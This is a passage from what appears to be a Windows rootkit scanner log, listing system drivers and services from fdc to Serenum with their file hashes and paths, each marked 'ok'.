18:04:54.0301 5600 [ 63BDADA84951B9C03E641800E176898A ] fdc C:\Windows\system32\DRIVERS\fdc.sys
18:04:54.0347 5600 fdc - ok
18:04:54.0389 5600 [ 6629B5F0E98151F4AFDD87567EA32BA3 ] fdPHost C:\Windows\system32\fdPHost.dll
18:04:54.0419 5600 fdPHost - ok
18:04:54.0439 5600 [ 89ED56DCE8E47AF40892778A5BD31FD2 ] FDResPub C:\Windows\system32\fdrespub.dll
18:04:54.0489 5600 FDResPub - ok
18:04:54.0499 5600 [ A8C0139A884861E3AAE9CFE73B208A9F ] FileInfo C:\Windows\system32\drivers\fileinfo.sys
18:04:54.0509 5600 FileInfo - ok
18:04:54.0539 5600 [ 0AE429A696AECBC5970E3CF2C62635AE ] Filetrace C:\Windows\system32\drivers\filetrace.sys
18:04:54.0569 5600 Filetrace - ok
18:04:54.0579 5600 [ 6603957EFF5EC62D25075EA8AC27DE68 ] flpydisk C:\Windows\system32\DRIVERS\flpydisk.sys
18:04:54.0619 5600 flpydisk - ok
18:04:54.0659 5600 [ 01334F9EA68E6877C4EF05D3EA8ABB05 ] FltMgr C:\Windows\system32\drivers\fltmgr.sys
18:04:54.0679 5600 FltMgr - ok
18:04:54.0719 5600 [ 8CE364388C8ECA59B14B539179276D44 ] FontCache C:\Windows\system32\FntCache.dll
18:04:54.0789 5600 FontCache - ok
18:04:54.0879 5600 [ C7FBDD1ED42F82BFA35167A5C9803EA3 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
18:04:54.0889 5600 FontCache3.0.0.0 - ok
18:04:54.0939 5600 [ B972A66758577E0BFD1DE0F91AAA27B5 ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys
18:04:54.0959 5600 Fs_Rec - ok
18:04:55.0009 5600 [ 4E1CD0A45C50A8882616CAE5BF82F3C5 ] gagp30kx C:\Windows\system32\drivers\gagp30kx.sys
18:04:55.0010 5600 gagp30kx - ok
18:04:55.0049 5600 [ 8182FF89C65E4D38B2DE4BB0FB18564E ] GEARAspiWDM C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
18:04:55.0059 5600 GEARAspiWDM - ok
18:04:55.0092 5600 [ CD5D0AEEE35DFD4E986A5AA1500A6E66 ] gpsvc C:\Windows\System32\gpsvc.dll
18:04:55.0131 5600 gpsvc - ok
18:04:55.0160 5600 [ 88A78635B41ED4B261365FADEB28FE81 ] HBtnKey C:\Windows\system32\DRIVERS\cpqbttn.sys
18:04:55.0188 5600 HBtnKey - ok
18:04:55.0213 5600 [ CB04C744BE0A61B1D648FAED182C3B59 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
18:04:55.0262 5600 HdAudAddService - ok
18:04:55.0294 5600 [ 062452B7FFD68C8C042A6261FE8DFF4A ] HDAudBus C:\Windows\system32\DRIVERS\HDAudBus.sys
18:04:55.0332 5600 HDAudBus - ok
18:04:55.0361 5600 [ 1338520E78D90154ED6BE8F84DE5FCEB ] HidBth C:\Windows\system32\drivers\hidbth.sys
18:04:55.0406 5600 HidBth - ok
18:04:55.0428 5600 [ FF3160C3A2445128C5A6D9B076DA519E ] HidIr C:\Windows\system32\drivers\hidir.sys
18:04:55.0474 5600 HidIr - ok
18:04:55.0499 5600 [ 84067081F3318162797385E11A8F0582 ] hidserv C:\Windows\system32\hidserv.dll
18:04:55.0516 5600 hidserv - ok
18:04:55.0534 5600 [ CCA4B519B17E23A00B826C55716809CC ] HidUsb C:\Windows\system32\DRIVERS\hidusb.sys
18:04:55.0556 5600 HidUsb - ok
18:04:55.0574 5600 [ D8AD255B37DA92434C26E4876DB7D418 ] hkmsvc C:\Windows\system32\kmsvc.dll
18:04:55.0603 5600 hkmsvc - ok
18:04:55.0621 5600 [ DF353B401001246853763C4B7AAA6F50 ] HpCISSs C:\Windows\system32\drivers\hpcisss.sys
18:04:55.0634 5600 HpCISSs - ok
18:04:55.0659 5600 [ 64637B65C90DF48C94BB9346AFB3AC61 ] hpdskflt C:\Windows\system32\DRIVERS\hpdskflt.sys
18:04:55.0671 5600 hpdskflt - ok
18:04:55.0709 5600 [ FDF273A845F1FFCCEADF363AAF47582F ] hpqwmiex C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
18:04:55.0728 5600 hpqwmiex - ok
18:04:55.0744 5600 [ DB8CF923DFD8DD336BEA7F439A627858 ] hpsrv C:\Windows\system32\Hpservice.exe
18:04:55.0755 5600 hpsrv - ok
18:04:55.0785 5600 [ 0EEECA26C8D4BDE2A4664DB058A81937 ] HTTP C:\Windows\system32\drivers\HTTP.sys
18:04:55.0824 5600 HTTP - ok
18:04:55.0830 5600 hwdatacard - ok
18:04:55.0858 5600 [ 324C2152FF2C61ABAE92D09F3CCA4D63 ] i2omp C:\Windows\system32\drivers\i2omp.sys
18:04:55.0870 5600 i2omp - ok
18:04:55.0895 5600 [ 22D56C8184586B7A1F6FA60BE5F5A2BD ] i8042prt C:\Windows\system32\DRIVERS\i8042prt.sys
18:04:55.0922 5600 i8042prt - ok
18:04:55.0954 5600 [ C957BF4B5D80B46C5017BF0101E6C906 ] iaStorV C:\Windows\system32\drivers\iastorv.sys
18:04:55.0973 5600 iaStorV - ok
18:04:56.0038 5600 [ 98477B08E61945F974ED9FDC4CB6BDAB ] idsvc C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
18:04:56.0072 5600 idsvc - ok
18:04:56.0160 5600 [ 0391268713612372E4E0ECEAADAD41D5 ] igfx C:\Windows\system32\DRIVERS\igdkmd32.sys
18:04:56.0287 5600 igfx - ok
18:04:56.0322 5600 [ 2D077BF86E843F901D8DB709C95B49A5 ] iirsp C:\Windows\system32\drivers\iirsp.sys
18:04:56.0339 5600 iirsp - ok
18:04:56.0375 5600 [ 9908D8A397B76CD8D31D0D383C5773C9 ] IKEEXT C:\Windows\System32\ikeext.dll
18:04:56.0435 5600 IKEEXT - ok
18:04:56.0467 5600 [ 97469037714070E45194ED318D636401 ] intelide C:\Windows\system32\drivers\intelide.sys
18:04:56.0482 5600 intelide - ok
18:04:56.0492 5600 [ 224191001E78C89DFA78924C3EA595FF ] intelppm C:\Windows\system32\DRIVERS\intelppm.sys
18:04:56.0522 5600 intelppm - ok
18:04:56.0542 5600 [ 9AC218C6E6105477484C6FDBE7D409A4 ] IPBusEnum C:\Windows\system32\ipbusenum.dll
18:04:56.0562 5600 IPBusEnum - ok
18:04:56.0592 5600 [ 62C265C38769B864CB25B4BCF62DF6C3 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys
18:04:56.0622 5600 IpFilterDriver - ok
18:04:56.0642 5600 [ 1998BD97F950680BB55F55A7244679C2 ] iphlpsvc C:\Windows\System32\iphlpsvc.dll
18:04:56.0672 5600 iphlpsvc - ok
18:04:56.0672 5600 IpInIp - ok
18:04:56.0702 5600 [ 40F34F8ABA2A015D780E4B09138B6C17 ] IPMIDRV C:\Windows\system32\drivers\ipmidrv.sys
18:04:56.0742 5600 IPMIDRV - ok
18:04:56.0772 5600 [ 8793643A67B42CEC66490B2A0CF92D68 ] IPNAT C:\Windows\system32\DRIVERS\ipnat.sys
18:04:56.0802 5600 IPNAT - ok
18:04:56.0852 5600 [ E6BE7A41A28D8F2DB174957454D32448 ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
18:04:56.0882 5600 iPod Service - ok
18:04:56.0962 5600 [ 109C0DFB82C3632FBD11949B73AEEAC9 ] IRENUM C:\Windows\system32\drivers\irenum.sys
18:04:56.0982 5600 IRENUM - ok
18:04:57.0012 5600 [ 350FCA7E73CF65BCEF43FAE1E4E91293 ] isapnp C:\Windows\system32\drivers\isapnp.sys
18:04:57.0022 5600 isapnp - ok
18:04:57.0042 5600 [ 232FA340531D940AAC623B121A595034 ] iScsiPrt C:\Windows\system32\DRIVERS\msiscsi.sys
18:04:57.0062 5600 iScsiPrt - ok
18:04:57.0095 5600 [ BCED60D16156E428F8DF8CF27B0DF150 ] iteatapi C:\Windows\system32\drivers\iteatapi.sys
18:04:57.0107 5600 iteatapi - ok
18:04:57.0126 5600 [ 06FA654504A498C30ADCA8BEC4E87E7E ] iteraid C:\Windows\system32\drivers\iteraid.sys
18:04:57.0139 5600 iteraid - ok
18:04:57.0160 5600 [ 37605E0A8CF00CBBA538E753E4344C6E ] kbdclass C:\Windows\system32\DRIVERS\kbdclass.sys
18:04:57.0175 5600 kbdclass - ok
18:04:57.0191 5600 [ EDE59EC70E25C24581ADD1FBEC7325F7 ] kbdhid C:\Windows\system32\DRIVERS\kbdhid.sys
18:04:57.0211 5600 kbdhid - ok
18:04:57.0235 5600 [ A3E186B4B935905B829219502557314E ] KeyIso C:\Windows\system32\lsass.exe
18:04:57.0263 5600 KeyIso - ok
18:04:57.0300 5600 [ 4A1445EFA932A3BAF5BDB02D7131EE20 ] KSecDD C:\Windows\system32\Drivers\ksecdd.sys
18:04:57.0325 5600 KSecDD - ok
18:04:57.0358 5600 [ 8078F8F8F7A79E2E6B494523A828C585 ] KtmRm C:\Windows\system32\msdtckrm.dll
18:04:57.0397 5600 KtmRm - ok
18:04:57.0424 5600 [ 1BF5EEBFD518DD7298434D8C862F825D ] LanmanServer C:\Windows\system32\srvsvc.dll
18:04:57.0443 5600 LanmanServer - ok
18:04:57.0482 5600 [ 1DB69705B695B987082C8BAEC0C6B34F ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
18:04:57.0511 5600 LanmanWorkstation - ok
18:04:57.0534 5600 [ D1C5883087A0C3F1344D9D55A44901F6 ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys
18:04:57.0561 5600 lltdio - ok
18:04:57.0588 5600 [ 2D5A428872F1442631D0959A34ABFF63 ] lltdsvc C:\Windows\System32\lltdsvc.dll
18:04:57.0617 5600 lltdsvc - ok
18:04:57.0660 5600 [ 35D40113E4A5B961B6CE5C5857702518 ] lmhosts C:\Windows\System32\lmhsvc.dll
18:04:57.0706 5600 lmhosts - ok
18:04:57.0740 5600 [ A2262FB9F28935E862B4DB46438C80D2 ] LSI_FC C:\Windows\system32\drivers\lsi_fc.sys
18:04:57.0755 5600 LSI_FC - ok
18:04:57.0763 5600 [ 30D73327D390F72A62F32C103DAF1D6D ] LSI_SAS C:\Windows\system32\drivers\lsi_sas.sys
18:04:57.0776 5600 LSI_SAS - ok
18:04:57.0790 5600 [ E1E36FEFD45849A95F1AB81DE0159FE3 ] LSI_SCSI C:\Windows\system32\drivers\lsi_scsi.sys
18:04:57.0802 5600 LSI_SCSI - ok
18:04:57.0839 5600 [ 23B55D27A0AFB7FE9CBCB20B617CC168 ] Ltn_stk7070P C:\Windows\system32\DRIVERS\Ltn_stk7070P.sys
18:04:57.0886 5600 Ltn_stk7070P - ok
18:04:57.0908 5600 [ 1FA7503D019291C027FEDAE509BC5500 ] Ltn_stkrc C:\Windows\system32\DRIVERS\Ltn_stkrc.sys
18:04:57.0932 5600 Ltn_stkrc - ok
18:04:57.0957 5600 [ 8F5C7426567798E62A3B3614965D62CC ] luafv C:\Windows\system32\drivers\luafv.sys
18:04:57.0984 5600 luafv - ok
18:04:58.0011 5600 [ D153B14FC6598EAE8422A2037553ADCE ] megasas C:\Windows\system32\drivers\megasas.sys
18:04:58.0023 5600 megasas - ok
18:04:58.0041 5600 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] MMCSS C:\Windows\system32\mmcss.dll
18:04:58.0071 5600 MMCSS - ok
18:04:58.0097 5600 [ E13B5EA0F51BA5B1512EC671393D09BA ] Modem C:\Windows\system32\drivers\modem.sys
18:04:58.0125 5600 Modem - ok
18:04:58.0142 5600 [ 0A9BB33B56E294F686ABB7C1E4E2D8A8 ] monitor C:\Windows\system32\DRIVERS\monitor.sys
18:04:58.0172 5600 monitor - ok
18:04:58.0214 5600 [ 5BF6A1326A335C5298477754A506D263 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys
18:04:58.0227 5600 mouclass - ok
18:04:58.0245 5600 [ 93B8D4869E12CFBE663915502900876F ] mouhid C:\Windows\system32\DRIVERS\mouhid.sys
18:04:58.0273 5600 mouhid - ok
18:04:58.0293 5600 [ BDAFC88AA6B92F7842416EA6A48E1600 ] MountMgr C:\Windows\system32\drivers\mountmgr.sys
18:04:58.0308 5600 MountMgr - ok
18:04:58.0335 5600 [ 51A84B690DF519DCF656F780243D953E ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
18:04:58.0348 5600 MozillaMaintenance - ok
18:04:58.0389 5600 [ 583A41F26278D9E0EA548163D6139397 ] mpio C:\Windows\system32\drivers\mpio.sys
18:04:58.0402 5600 mpio - ok
18:04:58.0445 5600 [ 22241FEBA9B2DEFA669C8CB0A8DD7D2E ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys
18:04:58.0469 5600 mpsdrv - ok
18:04:58.0505 5600 [ 5DE62C6E9108F14F6794060A9BDECAEC ] MpsSvc C:\Windows\system32\mpssvc.dll
18:04:58.0541 5600 MpsSvc - ok
18:04:58.0567 5600 [ 4FBBB70D30FD20EC51F80061703B001E ] Mraid35x C:\Windows\system32\drivers\mraid35x.sys
18:04:58.0579 5600 Mraid35x - ok
18:04:58.0603 5600 [ 82CEA0395524AACFEB58BA1448E8325C ] MRxDAV C:\Windows\system32\drivers\mrxdav.sys
18:04:58.0619 5600 MRxDAV - ok
18:04:58.0649 5600 [ 1E94971C4B446AB2290DEB71D01CF0C2 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys
18:04:58.0680 5600 mrxsmb - ok
18:04:58.0705 5600 [ 4FCCB34D793B116423209C0F8B7A3B03 ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys
18:04:58.0721 5600 mrxsmb10 - ok
18:04:58.0729 5600 [ C3CB1B40AD4A0124D617A1199B0B9D7C ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys
18:04:58.0743 5600 mrxsmb20 - ok
18:04:58.0772 5600 [ 5457DCFA7C0DA43522F4D9D4049C1472 ] msahci C:\Windows\system32\drivers\msahci.sys
18:04:58.0805 5600 msahci - ok
18:04:58.0821 5600 [ 3FC82A2AE4CC149165A94699183D3028 ] msdsm C:\Windows\system32\drivers\msdsm.sys
18:04:58.0837 5600 msdsm - ok
18:04:58.0852 5600 [ FD7520CC3A80C5FC8C48852BB24C6DED ] MSDTC C:\Windows\System32\msdtc.exe
18:04:58.0883 5600 MSDTC - ok
18:04:58.0915 5600 [ A9927F4A46B816C92F461ACB90CF8515 ] Msfs C:\Windows\system32\drivers\Msfs.sys
18:04:58.0946 5600 Msfs - ok
18:04:58.0961 5600 [ 0F400E306F385C56317357D6DEA56F62 ] msisadrv C:\Windows\system32\drivers\msisadrv.sys
18:04:58.0977 5600 msisadrv - ok
18:04:59.0008 5600 [ 85466C0757A23D9A9AECDC0755203CB2 ] MSiSCSI C:\Windows\system32\iscsiexe.dll
18:04:59.0039 5600 MSiSCSI - ok
18:04:59.0039 5600 msiserver - ok
18:04:59.0071 5600 [ D8C63D34D9C9E56C059E24EC7185CC07 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys
18:04:59.0102 5600 MSKSSRV - ok
18:04:59.0117 5600 [ 1D373C90D62DDB641D50E55B9E78D65E ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys
18:04:59.0149 5600 MSPCLOCK - ok
18:04:59.0164 5600 [ B572DA05BF4E098D4BBA3A4734FB505B ] MSPQM C:\Windows\system32\drivers\MSPQM.sys
18:04:59.0195 5600 MSPQM - ok
18:04:59.0227 5600 [ B49456D70555DE905C311BCDA6EC6ADB ] MsRPC C:\Windows\system32\drivers\MsRPC.sys
18:04:59.0242 5600 MsRPC - ok
18:04:59.0258 5600 [ E384487CB84BE41D09711C30CA79646C ] mssmbios C:\Windows\system32\DRIVERS\mssmbios.sys
18:04:59.0273 5600 mssmbios - ok
18:04:59.0273 5600 [ 7199C1EEC1E4993CAF96B8C0A26BD58A ] MSTEE C:\Windows\system32\drivers\MSTEE.sys
18:04:59.0305 5600 MSTEE - ok
18:04:59.0320 5600 [ 6A57B5733D4CB702C8EA4542E836B96C ] Mup C:\Windows\system32\Drivers\mup.sys
18:04:59.0336 5600 Mup - ok
18:04:59.0367 5600 [ E4EAF0C5C1B41B5C83386CF212CA9584 ] napagent C:\Windows\system32\qagentRT.dll
18:04:59.0398 5600 napagent - ok
18:04:59.0445 5600 [ 85C44FDFF9CF7E72A40DCB7EC06A4416 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys
18:04:59.0461 5600 NativeWifiP - ok
18:04:59.0492 5600 [ 1357274D1883F68300AEADD15D7BBB42 ] NDIS C:\Windows\system32\drivers\ndis.sys
18:04:59.0523 5600 NDIS - ok
18:04:59.0554 5600 [ 0E186E90404980569FB449BA7519AE61 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys
18:04:59.0570 5600 NdisTapi - ok
18:04:59.0601 5600 [ D6973AA34C4D5D76C0430B181C3CD389 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys
18:04:59.0617 5600 Ndisuio - ok
18:04:59.0632 5600 [ 818F648618AE34F729FDB47EC68345C3 ] NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys
18:04:59.0663 5600 NdisWan - ok
18:04:59.0695 5600 [ 71DAB552B41936358F3B541AE5997FB3 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys
18:04:59.0710 5600 NDProxy - ok
18:04:59.0726 5600 [ BCD093A5A6777CF626434568DC7DBA78 ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys
18:04:59.0741 5600 NetBIOS - ok
18:04:59.0773 5600 [ ECD64230A59CBD93C85F1CD1CAB9F3F6 ] netbt C:\Windows\system32\DRIVERS\netbt.sys
18:04:59.0788 5600 netbt - ok
18:04:59.0819 5600 [ A3E186B4B935905B829219502557314E ] Netlogon C:\Windows\system32\lsass.exe
18:04:59.0835 5600 Netlogon - ok
18:04:59.0866 5600 [ C8052711DAECC48B982434C5116CA401 ] Netman C:\Windows\System32\netman.dll
18:04:59.0897 5600 Netman - ok
18:04:59.0913 5600 [ 2EF3BBE22E5A5ACD1428EE387A0D0172 ] netprofm C:\Windows\System32\netprofm.dll
18:04:59.0943 5600 netprofm - ok
18:04:59.0983 5600 [ D6C4E4A39A36029AC0813D476FBD0248 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
18:04:59.0993 5600 NetTcpPortSharing - ok
18:05:00.0123 5600 [ 8DE67BD902095A13329FD82C85A1FA09 ] NETw5v32 C:\Windows\system32\DRIVERS\NETw5v32.sys
18:05:00.0263 5600 NETw5v32 - ok
18:05:00.0293 5600 [ 2E7FB731D4790A1BC6270ACCEFACB36E ] nfrd960 C:\Windows\system32\drivers\nfrd960.sys
18:05:00.0303 5600 nfrd960 - ok
18:05:00.0323 5600 [ 2997B15415F9BBE05B5A4C1C85E0C6A2 ] NlaSvc C:\Windows\System32\nlasvc.dll
18:05:00.0363 5600 NlaSvc - ok
18:05:00.0393 5600 [ D36F239D7CCE1931598E8FB90A0DBC26 ] Npfs C:\Windows\system32\drivers\Npfs.sys
18:05:00.0413 5600 Npfs - ok
18:05:00.0433 5600 [ 8BB86F0C7EEA2BDED6FE095D0B4CA9BD ] nsi C:\Windows\system32\nsisvc.dll
18:05:00.0463 5600 nsi - ok
18:05:00.0483 5600 [ 609773E344A97410CE4EBF74A8914FCF ] nsiproxy C:\Windows\system32\drivers\nsiproxy.sys
18:05:00.0503 5600 nsiproxy - ok
18:05:00.0553 5600 [ 6A4A98CEE84CF9E99564510DDA4BAA47 ] Ntfs C:\Windows\system32\drivers\Ntfs.sys
18:05:00.0593 5600 Ntfs - ok
18:05:00.0613 5600 [ E875C093AEC0C978A90F30C9E0DFBB72 ] ntrigdigi C:\Windows\system32\drivers\ntrigdigi.sys
18:05:00.0663 5600 ntrigdigi - ok
18:05:00.0713 5600 [ C5DBBCDA07D780BDA9B685DF333BB41E ] Null C:\Windows\system32\drivers\Null.sys
18:05:00.0743 5600 Null - ok
18:05:00.0763 5600 [ E69E946F80C1C31C53003BFBF50CBB7C ] nvraid C:\Windows\system32\drivers\nvraid.sys
18:05:00.0773 5600 nvraid - ok
18:05:00.0803 5600 [ 9E0BA19A28C498A6D323D065DB76DFFC ] nvstor C:\Windows\system32\drivers\nvstor.sys
18:05:00.0813 5600 nvstor - ok
18:05:00.0843 5600 [ 07C186427EB8FCC3D8D7927187F260F7 ] nv_agp C:\Windows\system32\drivers\nv_agp.sys
18:05:00.0853 5600 nv_agp - ok
18:05:00.0863 5600 NwlnkFlt - ok
18:05:00.0873 5600 NwlnkFwd - ok
18:05:00.0893 5600 [ BE32DA025A0BE1878F0EE8D6D9386CD5 ] ohci1394 C:\Windows\system32\drivers\ohci1394.sys
18:05:00.0933 5600 ohci1394 - ok
18:05:00.0973 5600 [ 0C8E8E61AD1EB0B250B846712C917506 ] p2pimsvc C:\Windows\system32\p2psvc.dll
18:05:01.0023 5600 p2pimsvc - ok
18:05:01.0033 5600 [ 0C8E8E61AD1EB0B250B846712C917506 ] p2psvc C:\Windows\system32\p2psvc.dll
18:05:01.0062 5600 p2psvc - ok
18:05:01.0118 5600 [ 0FA9B5055484649D63C303FE404E5F4D ] Parport C:\Windows\system32\drivers\parport.sys
18:05:01.0162 5600 Parport - ok
18:05:01.0219 5600 [ B9C2B89F08670E159F7181891E449CD9 ] partmgr C:\Windows\system32\drivers\partmgr.sys
18:05:01.0235 5600 partmgr - ok
18:05:01.0275 5600 [ 4F9A6A8A31413180D0FCB279AD5D8112 ] Parvdm C:\Windows\system32\drivers\parvdm.sys
18:05:01.0321 5600 Parvdm - ok
18:05:01.0348 5600 [ C6276AD11F4BB49B58AA1ED88537F14A ] PcaSvc C:\Windows\System32\pcasvc.dll
18:05:01.0364 5600 PcaSvc - ok
18:05:01.0391 5600 [ 941DC1D19E7E8620F40BBC206981EFDB ] pci C:\Windows\system32\drivers\pci.sys
18:05:01.0407 5600 pci - ok
18:05:01.0438 5600 [ 3B1901E401473E03EB8C874271E50C26 ] pciide C:\Windows\system32\drivers\pciide.sys
18:05:01.0450 5600 pciide - ok
18:05:01.0474 5600 [ E6F3FB1B86AA519E7698AD05E58B04E5 ] pcmcia C:\Windows\system32\drivers\pcmcia.sys
18:05:01.0489 5600 pcmcia - ok
18:05:01.0526 5600 [ 6349F6ED9C623B44B52EA3C63C831A92 ] PEAUTH C:\Windows\system32\drivers\peauth.sys
18:05:01.0593 5600 PEAUTH - ok
18:05:01.0670 5600 [ B1689DF169143F57053F795390C99DB3 ] pla C:\Windows\system32\pla.dll
18:05:01.0780 5600 pla - ok
18:05:01.0806 5600 [ C5E7F8A996EC0A82D508FD9064A5569E ] PlugPlay C:\Windows\system32\umpnpmgr.dll
18:05:01.0836 5600 PlugPlay - ok
18:05:01.0863 5600 [ 0C8E8E61AD1EB0B250B846712C917506 ] PNRPAutoReg C:\Windows\system32\p2psvc.dll
18:05:01.0891 5600 PNRPAutoReg - ok
18:05:01.0908 5600 [ 0C8E8E61AD1EB0B250B846712C917506 ] PNRPsvc C:\Windows\system32\p2psvc.dll
18:05:01.0936 5600 PNRPsvc - ok
18:05:01.0980 5600 [ D0494460421A03CD5225CCA0059AA146 ] PolicyAgent C:\Windows\System32\ipsecsvc.dll
18:05:02.0014 5600 PolicyAgent - ok
18:05:02.0040 5600 [ ECFFFAEC0C1ECD8DBC77F39070EA1DB1 ] PptpMiniport C:\Windows\system32\DRIVERS\raspptp.sys
18:05:02.0068 5600 PptpMiniport - ok
18:05:02.0091 5600 [ 0E3CEF5D28B40CF273281D620C50700A ] Processor C:\Windows\system32\drivers\processr.sys
18:05:02.0136 5600 Processor - ok
18:05:02.0164 5600 [ 0508FAA222D28835310B7BFCA7A77346 ] ProfSvc C:\Windows\system32\profsvc.dll
18:05:02.0195 5600 ProfSvc - ok
18:05:02.0213 5600 [ A3E186B4B935905B829219502557314E ] ProtectedStorage C:\Windows\system32\lsass.exe
18:05:02.0228 5600 ProtectedStorage - ok
18:05:02.0253 5600 [ 99514FAA8DF93D34B5589187DB3AA0BA ] PSched C:\Windows\system32\DRIVERS\pacer.sys
18:05:02.0275 5600 PSched - ok
18:05:02.0321 5600 [ CCDAC889326317792480C0A67156A1EC ] ql2300 C:\Windows\system32\drivers\ql2300.sys
18:05:02.0356 5600 ql2300 - ok
18:05:02.0367 5600 [ 81A7E5C076E59995D54BC1ED3A16E60B ] ql40xx C:\Windows\system32\drivers\ql40xx.sys
18:05:02.0381 5600 ql40xx - ok
18:05:02.0402 5600 [ E9ECAE663F47E6CB43962D18AB18890F ] QWAVE C:\Windows\system32\qwave.dll
18:05:02.0423 5600 QWAVE - ok
18:05:02.0456 5600 [ 9F5E0E1926014D17486901C88ECA2DB7 ] QWAVEdrv C:\Windows\system32\drivers\qwavedrv.sys
18:05:02.0471 5600 QWAVEdrv - ok
18:05:02.0496 5600 [ 147D7F9C556D259924351FEB0DE606C3 ] RasAcd C:\Windows\system32\DRIVERS\rasacd.sys
18:05:02.0523 5600 RasAcd - ok
18:05:02.0553 5600 [ F6A452EB4CEADBB51C9E0EE6B3ECEF0F ] RasAuto C:\Windows\System32\rasauto.dll
18:05:02.0583 5600 RasAuto - ok
18:05:02.0601 5600 [ A214ADBAF4CB47DD2728859EF31F26B0 ] Rasl2tp C:\Windows\system32\DRIVERS\rasl2tp.sys
18:05:02.0629 5600 Rasl2tp - ok
18:05:02.0660 5600 [ 75D47445D70CA6F9F894B032FBC64FCF ] RasMan C:\Windows\System32\rasmans.dll
18:05:02.0688 5600 RasMan - ok
18:05:02.0725 5600 [ 509A98DD18AF4375E1FC40BC175F1DEF ] RasPppoe C:\Windows\system32\DRIVERS\raspppoe.sys
18:05:02.0745 5600 RasPppoe - ok
18:05:02.0758 5600 [ 2005F4A1E05FA09389AC85840F0A9E4D ] RasSstp C:\Windows\system32\DRIVERS\rassstp.sys
18:05:02.0787 5600 RasSstp - ok
18:05:02.0826 5600 [ B14C9D5B9ADD2F84F70570BBBFAA7935 ] rdbss C:\Windows\system32\DRIVERS\rdbss.sys
18:05:02.0853 5600 rdbss - ok
18:05:02.0872 5600 [ 89E59BE9A564262A3FB6C4F4F1CD9899 ] RDPCDD C:\Windows\system32\DRIVERS\RDPCDD.sys
18:05:02.0900 5600 RDPCDD - ok
18:05:02.0930 5600 [ E8BD98D46F2ED77132BA927FCCB47D8B ] rdpdr C:\Windows\system32\drivers\rdpdr.sys
18:05:02.0979 5600 rdpdr - ok
18:05:02.0987 5600 [ 9D91FE5286F748862ECFFA05F8A0710C ] RDPENCDD C:\Windows\system32\drivers\rdpencdd.sys
18:05:03.0014 5600 RDPENCDD - ok
18:05:03.0047 5600 [ C127EBD5AFAB31524662C48DFCEB773A ] RDPWD C:\Windows\system32\drivers\RDPWD.sys
18:05:03.0070 5600 RDPWD - ok
18:05:03.0097 5600 [ BCDD6B4804D06B1F7EBF29E53A57ECE9 ] RemoteAccess C:\Windows\System32\mprdim.dll
18:05:03.0151 5600 RemoteAccess - ok
18:05:03.0182 5600 [ 9E6894EA18DAFF37B63E1005F83AE4AB ] RemoteRegistry C:\Windows\system32\regsvc.dll
18:05:03.0198 5600 RemoteRegistry - ok
18:05:03.0229 5600 [ 6482707F9F4DA0ECBAB43B2E0398A101 ] RFCOMM C:\Windows\system32\DRIVERS\rfcomm.sys
18:05:03.0260 5600 RFCOMM - ok
18:05:03.0276 5600 [ 5123F83CBC4349D065534EEB6BBDC42B ] RpcLocator C:\Windows\system32\locator.exe
18:05:03.0291 5600 RpcLocator - ok
18:05:03.0322 5600 [ 3B5B4D53FEC14F7476CA29A20CC31AC9 ] RpcSs C:\Windows\system32\rpcss.dll
18:05:03.0369 5600 RpcSs - ok
18:05:03.0400 5600 [ 9C508F4074A39E8B4B31D27198146FAD ] rspndr C:\Windows\system32\DRIVERS\rspndr.sys
18:05:03.0416 5600 rspndr - ok
18:05:03.0432 5600 [ A3E186B4B935905B829219502557314E ] SamSs C:\Windows\system32\lsass.exe
18:05:03.0447 5600 SamSs - ok
18:05:03.0473 5600 [ 3CE8F073A557E172B330109436984E30 ] sbp2port C:\Windows\system32\drivers\sbp2port.sys
18:05:03.0493 5600 sbp2port - ok
18:05:03.0513 5600 [ 77B7A11A0C3D78D3386398FBBEA1B632 ] SCardSvr C:\Windows\System32\SCardSvr.dll
18:05:03.0543 5600 SCardSvr - ok
18:05:03.0573 5600 [ 1A58069DB21D05EB2AB58EE5753EBE8D ] Schedule C:\Windows\system32\schedsvc.dll
18:05:03.0633 5600 Schedule - ok
18:05:03.0653 5600 [ 312EC3E37A0A1F2006534913E37B4423 ] SCPolicySvc C:\Windows\System32\certprop.dll
18:05:03.0683 5600 SCPolicySvc - ok
18:05:03.0703 5600 [ 716313D9F6B0529D03F726D5AAF6F191 ] SDRSVC C:\Windows\System32\SDRSVC.dll
18:05:03.0733 5600 SDRSVC - ok
18:05:03.0763 5600 [ 90A3935D05B494A5A39D37E71F09A677 ] secdrv C:\Windows\system32\drivers\secdrv.sys
18:05:03.0803 5600 secdrv - ok
18:05:03.0823 5600 [ FD5199D4D8A521005E4B5EE7FE00FA9B ] seclogon C:\Windows\system32\seclogon.dll
18:05:03.0853 5600 seclogon - ok
18:05:03.0863 5600 [ A9BBAB5759771E523F55563D6CBE140F ] SENS C:\Windows\System32\sens.dll
18:05:03.0893 5600 SENS - ok
18:05:03.0913 5600 [ 68E44E331D46F0FB38F0863A84CD1A31 ] Serenum C:\Windows\system32\drivers\serenum.sys
18:05:03.0953 5600 Serenum - ok
